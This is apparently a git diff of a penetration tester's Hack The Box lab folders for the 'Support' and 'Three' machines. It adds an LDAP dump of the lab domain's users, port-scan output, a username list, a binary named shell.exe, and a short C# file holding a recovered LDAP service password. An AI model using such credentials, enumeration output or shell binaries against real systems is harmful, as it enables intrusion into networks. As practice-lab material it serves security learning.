+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111439.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: monroe.david@support.htb
+
+# west.laura, Users, support.htb
+dn: CN=west.laura,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: west.laura
+sn: west
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: laura
+distinguishedName: CN=west.laura,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111455.0Z
+whenChanged: 20220528111456.0Z
+uSNCreated: 12979
+uSNChanged: 12994
+company: support
+streetAddress: Skipper Bowles Dr
+name: west.laura
+objectGUID:: bqAMeaq42kGIZbfMnxXxRA==
+userAccountControl: 66048
+badPwdCount: 1309
+codePage: 0
+countryCode: 0
+badPasswordTime: 133053948661389063
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982100954464244
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILXAQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: west.laura
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111455.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: west.laura@support.htb
+
+# langley.lucy, Users, support.htb
+dn: CN=langley.lucy,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: langley.lucy
+sn: langley
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: lucy
+distinguishedName: CN=langley.lucy,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111510.0Z
+whenChanged: 20220528111511.0Z
+uSNCreated: 12996
+uSNChanged: 13011
+company: support
+streetAddress: Skipper Bowles Dr
+name: langley.lucy
+objectGUID:: T9fnf6QIlE2uz+4YhFZ3aw==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982101109308007
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILXQQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: langley.lucy
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111511.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: langley.lucy@support.htb
+
+# daughtler.mabel, Users, support.htb
+dn: CN=daughtler.mabel,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: daughtler.mabel
+sn: daughtler
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: mabel
+distinguishedName: CN=daughtler.mabel,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111526.0Z
+whenChanged: 20220528111527.0Z
+uSNCreated: 13013
+uSNChanged: 13028
+company: support
+streetAddress: Skipper Bowles Dr
+name: daughtler.mabel
+objectGUID:: iWH2yMa7h0e1dPAKT9MtgA==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982101262745576
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILXgQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: daughtler.mabel
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111526.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: daughtler.mabel@support.htb
+
+# stoll.rachelle, Users, support.htb
+dn: CN=stoll.rachelle,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: stoll.rachelle
+sn: stoll
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: rachelle
+distinguishedName: CN=stoll.rachelle,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111542.0Z
+whenChanged: 20220528111543.0Z
+uSNCreated: 13030
+uSNChanged: 13045
+company: support
+streetAddress: Skipper Bowles Dr
+name: stoll.rachelle
+objectGUID:: Oe9hWbyotkWg+Aty/bcKYw==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982101422902140
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILXwQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: stoll.rachelle
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111542.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: stoll.rachelle@support.htb
+
+# ford.victoria, Users, support.htb
+dn: CN=ford.victoria,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: ford.victoria
+sn: ford
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: victoria
+distinguishedName: CN=ford.victoria,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111557.0Z
+whenChanged: 20220528111558.0Z
+uSNCreated: 13048
+uSNChanged: 13063
+company: support
+streetAddress: Skipper Bowles Dr
+name: ford.victoria
+objectGUID:: igFAMPhgAEqMFr/4HUIY5A==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982101581183009
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILYAQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: ford.victoria
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111558.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: ford.victoria@support.htb
+
+# Administrator, Users, support.htb
+dn: CN=Administrator,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: Administrator
+description: Built-in account for administering the computer/domain
+distinguishedName: CN=Administrator,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110156.0Z
+whenChanged: 20220819043227.0Z
+uSNCreated: 8196
+memberOf: CN=Group Policy Creator Owners,CN=Users,DC=support,DC=htb
+memberOf: CN=Domain Admins,CN=Users,DC=support,DC=htb
+memberOf: CN=Enterprise Admins,CN=Users,DC=support,DC=htb
+memberOf: CN=Schema Admins,CN=Users,DC=support,DC=htb
+memberOf: CN=Administrators,CN=Builtin,DC=support,DC=htb
+uSNChanged: 81954
+name: Administrator
+objectGUID:: ltGa4T+PO0uTHnjAEEcLlw==
+userAccountControl: 512
+badPwdCount: 1
+codePage: 0
+countryCode: 0
+badPasswordTime: 133053851029724323
+lastLogoff: 0
+lastLogon: 133053571707670441
+logonHours:: ////////////////////////////
+pwdLastSet: 133027269567293588
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEIL9AEAAA==
+adminCount: 1
+accountExpires: 0
+logonCount: 62
+sAMAccountName: Administrator
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528111947.0Z
+dSCorePropagationData: 20220528111947.0Z
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101181216.0Z
+lastLogonTimestamp: 133053571475334311
+
+# Guest, Users, support.htb
+dn: CN=Guest,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: Guest
+description: Built-in account for guest access to the computer/domain
+distinguishedName: CN=Guest,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110156.0Z
+whenChanged: 20220819061524.0Z
+uSNCreated: 8197
+memberOf: CN=Guests,CN=Builtin,DC=support,DC=htb
+uSNChanged: 81994
+name: Guest
+objectGUID:: lHQIHI+KY06QsghOU1eULw==
+userAccountControl: 66080
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+logonHours:: ////////////////////////////
+pwdLastSet: 132982103352120821
+primaryGroupID: 514
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEIL9QEAAA==
+accountExpires: 0
+logonCount: 0
+sAMAccountName: Guest
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+lastLogonTimestamp: 133053633249317557
+
+# search result
+search: 2
+result: 0 Success
+
+# numResponses: 43
+# numEntries: 42
diff --git a/support/powershell-web-server.ps1 b/support/powershell-web-server.ps1
new file mode 100644
index 0000000..f8a409b
--- /dev/null
+++ b/support/powershell-web-server.ps1
@@ -0,0 +1,111 @@
+# This is a super **SIMPLE** example of how to create a very basic powershell webserver
+# 2019-05-18 UPDATE — Created by me and and evalued by @jakobii and the comunity.
+
+# Http Server
+$http = [System.Net.HttpListener]::new()
+
+# Hostname and port to listen on
+$http.Prefixes.Add("http://localhost:8080/")
+
+# Start the Http Server
+$http.Start()
+
+
+
+# Log ready message to terminal
+if ($http.IsListening) {
+ write-host " HTTP Server Ready! " -f 'black' -b 'gre'
+ write-host "now try going to $($http.Prefixes)" -f 'y'
+ write-host "then try going to $($http.Prefixes)other/path" -f 'y'
+}
+
+
+# INFINTE LOOP
+# Used to listen for requests
+while ($http.IsListening) {
+
+
+
+ # Get Request Url
+ # When a request is made in a web browser the GetContext() method will return a request object
+ # Our route examples below will use the request object properties to decide how to respond
+ $context = $http.GetContext()
+
+
+ # ROUTE EXAMPLE 1
+ # http://127.0.0.1/
+ if ($context.Request.HttpMethod -eq 'GET' -and $context.Request.RawUrl -eq '/') {
+
+ # We can log the request to the terminal
+ write-host "$($context.Request.UserHostAddress) => $($context.Request.Url)" -f 'mag'
+
+ # the html/data you want to send to the browser
+ # you could replace this with: [string]$html = Get-Content "C:\some\path\index.html" -Raw
+ [string]$html = "<h1>A Powershell Webserver</h1><p>home page</p>"
+
+ #resposed to the request
+ $buffer = [System.Text.Encoding]::UTF8.GetBytes($html) # convert htmtl to bytes
+ $context.Response.ContentLength64 = $buffer.Length
+ $context.Response.OutputStream.Write($buffer, 0, $buffer.Length) #stream to broswer
+ $context.Response.OutputStream.Close() # close the response
+
+ }
+
+
+
+ # ROUTE EXAMPLE 2
+ # http://127.0.0.1/some/form'
+ if ($context.Request.HttpMethod -eq 'GET' -and $context.Request.RawUrl -eq '/some/form') {
+
+ # We can log the request to the terminal
+ write-host "$($context.Request.UserHostAddress) => $($context.Request.Url)" -f 'mag'
+
+ [string]$html = "
+ <h1>A Powershell Webserver</h1>
+ <form action='/some/post' method='post'>
+ <p>A Basic Form</p>
+ <p>fullname</p>
+ <input type='text' name='fullname'>
+ <p>message</p>
+ <textarea rows='4' cols='50' name='message'></textarea>
+ <br>
+ <input type='submit' value='Submit'>
+ </form>
+ "
+
+ #resposed to the request
+ $buffer = [System.Text.Encoding]::UTF8.GetBytes($html)
+ $context.Response.ContentLength64 = $buffer.Length
+ $context.Response.OutputStream.Write($buffer, 0, $buffer.Length)
+ $context.Response.OutputStream.Close()
+ }
+
+ # ROUTE EXAMPLE 3
+ # http://127.0.0.1/some/post'
+ if ($context.Request.HttpMethod -eq 'POST' -and $context.Request.RawUrl -eq '/some/post') {
+
+ # decode the form post
+ # html form members need 'name' attributes as in the example!
+ $FormContent = [System.IO.StreamReader]::new($context.Request.InputStream).ReadToEnd()
+
+ # We can log the request to the terminal
+ write-host "$($context.Request.UserHostAddress) => $($context.Request.Url)" -f 'mag'
+ Write-Host $FormContent -f 'Green'
+
+ # the html/data
+ [string]$html = "<h1>A Powershell Webserver</h1><p>Post Successful!</p>"
+
+ #resposed to the request
+ $buffer = [System.Text.Encoding]::UTF8.GetBytes($html)
+ $context.Response.ContentLength64 = $buffer.Length
+ $context.Response.OutputStream.Write($buffer, 0, $buffer.Length)
+ $context.Response.OutputStream.Close()
+ }
+
+
+ # powershell will continue looping and listen for new requests...
+
+}
+
+# Note:
+# To end the loop you have to kill the powershell terminal. ctrl-c wont work :/ \ No newline at end of file
diff --git a/support/rustscan b/support/rustscan
new file mode 100644
index 0000000..6c4e66d
--- /dev/null
+++ b/support/rustscan
@@ -0,0 +1,148 @@
+.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
+| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
+| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
+`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
+The Modern Day Port Scanner.
+________________________________________
+: https://discord.gg/GFrQsGy           :
+: https://github.com/RustScan/RustScan :
+ --------------------------------------
+Real hackers hack time ⌛
+
+[~] The config file is expected to be at "/home/compromyse/.rustscan.toml"
+[~] Automatically increasing ulimit value to 5000.
+Open 10.10.11.174:53
+Open 10.10.11.174:88
+Open 10.10.11.174:135
+Open 10.10.11.174:139
+Open 10.10.11.174:389
+Open 10.10.11.174:464
+Open 10.10.11.174:593
+Open 10.10.11.174:636
+Open 10.10.11.174:445
+Open 10.10.11.174:9389
+Open 10.10.11.174:49668
+Open 10.10.11.174:49664
+Open 10.10.11.174:49674
+Open 10.10.11.174:49679
+Open 10.10.11.174:49702
+[~] Starting Script(s)
+[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
+
+[~] Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-19 14:57 IST
+NSE: Loaded 151 scripts for scanning.
+NSE: Script Pre-scanning.
+NSE: Starting runlevel 1 (of 3) scan.
+Initiating NSE at 14:57
+Completed NSE at 14:57, 0.00s elapsed
+NSE: Starting runlevel 2 (of 3) scan.
+Initiating NSE at 14:57
+Completed NSE at 14:57, 0.00s elapsed
+NSE: Starting runlevel 3 (of 3) scan.
+Initiating NSE at 14:57
+Completed NSE at 14:57, 0.00s elapsed
+Initiating Parallel DNS resolution of 1 host. at 14:57
+Completed Parallel DNS resolution of 1 host. at 14:57, 0.02s elapsed
+DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
+Initiating Connect Scan at 14:57
+Scanning 10.10.11.174 [15 ports]
+Discovered open port 53/tcp on 10.10.11.174
+Discovered open port 445/tcp on 10.10.11.174
+Discovered open port 135/tcp on 10.10.11.174
+Discovered open port 139/tcp on 10.10.11.174
+Discovered open port 9389/tcp on 10.10.11.174
+Discovered open port 49668/tcp on 10.10.11.174
+Discovered open port 593/tcp on 10.10.11.174
+Discovered open port 49674/tcp on 10.10.11.174
+Discovered open port 464/tcp on 10.10.11.174
+Discovered open port 636/tcp on 10.10.11.174
+Discovered open port 49702/tcp on 10.10.11.174
+Discovered open port 88/tcp on 10.10.11.174
+Discovered open port 49664/tcp on 10.10.11.174
+Discovered open port 389/tcp on 10.10.11.174
+Discovered open port 49679/tcp on 10.10.11.174
+Completed Connect Scan at 14:57, 0.65s elapsed (15 total ports)
+Initiating Service scan at 14:57
+Scanning 15 services on 10.10.11.174
+Completed Service scan at 15:00, 151.27s elapsed (15 services on 1 host)
+NSE: Script scanning 10.10.11.174.
+NSE: Starting runlevel 1 (of 3) scan.
+Initiating NSE at 15:00
+Stats: 0:02:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
+NSE: Active NSE Script Threads: 7 (7 waiting)
+NSE Timing: About 99.65% done; ETC: 15:00 (0:00:00 remaining)
+Stats: 0:02:40 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
+NSE: Active NSE Script Threads: 7 (7 waiting)
+NSE Timing: About 99.65% done; ETC: 15:00 (0:00:00 remaining)
+Stats: 0:02:40 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
+NSE: Active NSE Script Threads: 7 (7 waiting)
+NSE Timing: About 99.65% done; ETC: 15:00 (0:00:00 remaining)
+NSE Timing: About 99.95% done; ETC: 15:01 (0:00:00 remaining)
+Completed NSE at 15:01, 40.06s elapsed
+NSE: Starting runlevel 2 (of 3) scan.
+Initiating NSE at 15:01
+NSE Timing: About 98.33% done; ETC: 15:01 (0:00:01 remaining)
+Completed NSE at 15:02, 60.71s elapsed
+NSE: Starting runlevel 3 (of 3) scan.
+Initiating NSE at 15:02
+Completed NSE at 15:02, 0.00s elapsed
+Nmap scan report for 10.10.11.174
+Host is up, received user-set (0.33s latency).
+Scanned at 2022-08-19 14:57:59 IST for 252s
+
+PORT STATE SERVICE REASON VERSION
+53/tcp open domain? syn-ack
+| fingerprint-strings:
+| DNSVersionBindReqTCP:
+| version
+|_ bind
+88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2022-08-19 09:28:07Z)
+135/tcp open msrpc syn-ack Microsoft Windows RPC
+139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
+389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
+445/tcp open microsoft-ds? syn-ack
+464/tcp open kpasswd5? syn-ack
+593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
+636/tcp open tcpwrapped syn-ack
+9389/tcp open mc-nmf syn-ack .NET Message Framing
+49664/tcp open msrpc syn-ack Microsoft Windows RPC
+49668/tcp open msrpc syn-ack Microsoft Windows RPC
+49674/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
+49679/tcp open msrpc syn-ack Microsoft Windows RPC
+49702/tcp open msrpc syn-ack Microsoft Windows RPC
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port53-TCP:V=7.80%I=7%D=8/19%Time=62FF57AB%P=x86_64-pc-linux-gnu%r(DNSV
+SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
+SF:x04bind\0\0\x10\0\x03");
+Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+Host script results:
+|_clock-skew: 0s
+| p2p-conficker:
+| Checking for Conficker.C or higher...
+| Check 1 (port 27353/tcp): CLEAN (Timeout)
+| Check 2 (port 19493/tcp): CLEAN (Timeout)
+| Check 3 (port 45724/udp): CLEAN (Timeout)
+| Check 4 (port 4948/udp): CLEAN (Timeout)
+|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
+| smb2-security-mode:
+| 2.02:
+|_ Message signing enabled and required
+| smb2-time:
+| date: 2022-08-19T09:30:33
+|_ start_date: N/A
+
+NSE: Script Post-scanning.
+NSE: Starting runlevel 1 (of 3) scan.
+Initiating NSE at 15:02
+Completed NSE at 15:02, 0.00s elapsed
+NSE: Starting runlevel 2 (of 3) scan.
+Initiating NSE at 15:02
+Completed NSE at 15:02, 0.00s elapsed
+NSE: Starting runlevel 3 (of 3) scan.
+Initiating NSE at 15:02
+Completed NSE at 15:02, 0.00s elapsed
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 253.00 seconds
+
diff --git a/support/shell.exe b/support/shell.exe
new file mode 100644
index 0000000..1e79ee4
--- /dev/null
+++ b/support/shell.exe
Binary files differ
diff --git a/support/support.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI b/support/support.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
new file mode 100644
index 0000000..68e6d07
--- /dev/null
+++ b/support/support.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
@@ -0,0 +1,2 @@
+[General]
+Version=4
diff --git a/support/support.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf b/support/support.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
new file mode 100644
index 0000000..45972d1
--- /dev/null
+++ b/support/support.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
Binary files differ
diff --git a/support/support.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI b/support/support.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
new file mode 100644
index 0000000..c6675f2
--- /dev/null
+++ b/support/support.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
@@ -0,0 +1,2 @@
+[General]
+Version=1
diff --git a/support/support.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf b/support/support.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
new file mode 100644
index 0000000..c63aed7
--- /dev/null
+++ b/support/support.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
Binary files differ
diff --git a/support/userinfo/CommandLineParser.dll b/support/userinfo/CommandLineParser.dll
new file mode 100644
index 0000000..84b2c65
--- /dev/null
+++ b/support/userinfo/CommandLineParser.dll
Binary files differ
diff --git a/support/userinfo/Microsoft.Bcl.AsyncInterfaces.dll b/support/userinfo/Microsoft.Bcl.AsyncInterfaces.dll
new file mode 100644
index 0000000..476f1b1
--- /dev/null
+++ b/support/userinfo/Microsoft.Bcl.AsyncInterfaces.dll
Binary files differ
diff --git a/support/userinfo/Microsoft.Extensions.DependencyInjection.Abstractions.dll b/support/userinfo/Microsoft.Extensions.DependencyInjection.Abstractions.dll
new file mode 100644
index 0000000..edda9e2
--- /dev/null
+++ b/support/userinfo/Microsoft.Extensions.DependencyInjection.Abstractions.dll
Binary files differ
diff --git a/support/userinfo/Microsoft.Extensions.DependencyInjection.dll b/support/userinfo/Microsoft.Extensions.DependencyInjection.dll
new file mode 100644
index 0000000..d749915
--- /dev/null
+++ b/support/userinfo/Microsoft.Extensions.DependencyInjection.dll
Binary files differ
diff --git a/support/userinfo/Microsoft.Extensions.Logging.Abstractions.dll b/support/userinfo/Microsoft.Extensions.Logging.Abstractions.dll
new file mode 100644
index 0000000..5f578f7
--- /dev/null
+++ b/support/userinfo/Microsoft.Extensions.Logging.Abstractions.dll
Binary files differ
diff --git a/support/userinfo/System.Buffers.dll b/support/userinfo/System.Buffers.dll
new file mode 100644
index 0000000..f2d83c5
--- /dev/null
+++ b/support/userinfo/System.Buffers.dll
Binary files differ
diff --git a/support/userinfo/System.Memory.dll b/support/userinfo/System.Memory.dll
new file mode 100644
index 0000000..5d19470
--- /dev/null
+++ b/support/userinfo/System.Memory.dll
Binary files differ
diff --git a/support/userinfo/System.Numerics.Vectors.dll b/support/userinfo/System.Numerics.Vectors.dll
new file mode 100644
index 0000000..0865972
--- /dev/null
+++ b/support/userinfo/System.Numerics.Vectors.dll
Binary files differ
diff --git a/support/userinfo/System.Runtime.CompilerServices.Unsafe.dll b/support/userinfo/System.Runtime.CompilerServices.Unsafe.dll
new file mode 100644
index 0000000..c5ba4e4
--- /dev/null
+++ b/support/userinfo/System.Runtime.CompilerServices.Unsafe.dll
Binary files differ
diff --git a/support/userinfo/System.Threading.Tasks.Extensions.dll b/support/userinfo/System.Threading.Tasks.Extensions.dll
new file mode 100644
index 0000000..eeec928
--- /dev/null
+++ b/support/userinfo/System.Threading.Tasks.Extensions.dll
Binary files differ
diff --git a/support/userinfo/UserInfo.exe b/support/userinfo/UserInfo.exe
new file mode 100644
index 0000000..1ae3f83
--- /dev/null
+++ b/support/userinfo/UserInfo.exe
Binary files differ
diff --git a/support/userinfo/UserInfo.exe.config b/support/userinfo/UserInfo.exe.config
new file mode 100644
index 0000000..489d582
--- /dev/null
+++ b/support/userinfo/UserInfo.exe.config
@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="utf-8"?>
+<configuration>
+ <startup>
+ <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
+ </startup>
+ <runtime>
+ <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
+ <dependentAssembly>
+ <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
+ <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
+ </dependentAssembly>
+ </assemblyBinding>
+ </runtime>
+</configuration> \ No newline at end of file
diff --git a/support/userinfo/exploit.cs b/support/userinfo/exploit.cs
new file mode 100644
index 0000000..44da8d1
--- /dev/null
+++ b/support/userinfo/exploit.cs
@@ -0,0 +1,11 @@
+using System;
+using System.DirectoryServices;
+
+public class main {
+ public static void Main() {
+ string password = "nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz";
+ entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
+ entry.AuthenticationType = AuthenticationTypes.Secure;
+ ds = new DirectorySearcher(entry);
+ }
+}
diff --git a/support/usernames.txt b/support/usernames.txt
new file mode 100644
index 0000000..46d0039
--- /dev/null
+++ b/support/usernames.txt
@@ -0,0 +1,15 @@
+raven.clifton
+anderson.damian
+monroe.david
+cromwell.gerard
+west.laura
+levine.leopoldo
+langley.lucy
+daughtler.mabel
+bardot.mary
+stoll.rachelle
+thomas.raphael
+smith.rosario
+wilson.shelby
+hernandez.stanley
+ford.victoria \ No newline at end of file
diff --git a/three/rustscan b/three/rustscan
new file mode 100644
index 0000000..2bc9dee
--- /dev/null
+++ b/three/rustscan
@@ -0,0 +1,88 @@
+.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
+| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
+| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
+`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
+The Modern Day Port Scanner.
+________________________________________
+: https://discord.gg/GFrQsGy           :
+: https://github.com/RustScan/RustScan :
+ --------------------------------------
+Nmap? More like slowmap.🐢
+
+[~] The config file is expected to be at "/home/compromyse/.rustscan.toml"
+[~] Automatically increasing ulimit value to 5000.
+Open 10.129.124.211:22
+Open 10.129.124.211:80
+[~] Starting Script(s)
+[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
+
+[~] Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-18 22:02 IST
+NSE: Loaded 151 scripts for scanning.
+NSE: Script Pre-scanning.
+NSE: Starting runlevel 1 (of 3) scan.
+Initiating NSE at 22:02
+Completed NSE at 22:02, 0.00s elapsed
+NSE: Starting runlevel 2 (of 3) scan.
+Initiating NSE at 22:02
+Completed NSE at 22:02, 0.00s elapsed
+NSE: Starting runlevel 3 (of 3) scan.
+Initiating NSE at 22:02
+Completed NSE at 22:02, 0.00s elapsed
+Initiating Ping Scan at 22:02
+Scanning 10.129.124.211 [2 ports]
+Completed Ping Scan at 22:02, 0.25s elapsed (1 total hosts)
+Initiating Parallel DNS resolution of 1 host. at 22:02
+Completed Parallel DNS resolution of 1 host. at 22:02, 0.02s elapsed
+DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
+Initiating Connect Scan at 22:02
+Scanning 10.129.124.211 [2 ports]
+Discovered open port 22/tcp on 10.129.124.211
+Discovered open port 80/tcp on 10.129.124.211
+Completed Connect Scan at 22:02, 0.34s elapsed (2 total ports)
+Initiating Service scan at 22:02
+Scanning 2 services on 10.129.124.211
+Completed Service scan at 22:02, 6.61s elapsed (2 services on 1 host)
+NSE: Script scanning 10.129.124.211.
+NSE: Starting runlevel 1 (of 3) scan.
+Initiating NSE at 22:02
+Completed NSE at 22:03, 8.91s elapsed
+NSE: Starting runlevel 2 (of 3) scan.
+Initiating NSE at 22:03
+Completed NSE at 22:03, 1.12s elapsed
+NSE: Starting runlevel 3 (of 3) scan.
+Initiating NSE at 22:03
+Completed NSE at 22:03, 0.00s elapsed
+Nmap scan report for 10.129.124.211
+Host is up, received conn-refused (0.27s latency).
+Scanned at 2022-08-18 22:02:47 IST for 17s
+
+PORT STATE SERVICE REASON VERSION
+22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
